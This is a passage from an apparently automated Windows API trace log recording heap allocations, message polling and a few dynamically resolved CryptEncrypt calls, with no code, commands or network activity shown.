hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0249.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51b20 [0249.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0249.025] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54238 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0249.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0249.026] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0249.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0249.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0249.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0249.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0249.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0249.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.028] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0249.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0249.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.028] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0249.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0249.029] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.029] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x200) returned 1 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0490 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0249.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0249.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0249.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0249.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0249.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0249.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0270 | out: hHeap=0x970000) returned 1 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0258 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0490 | out: hHeap=0x970000) returned 1 [0249.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0249.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0249.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0249.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x200) returned 0x3bf0478 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0249.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 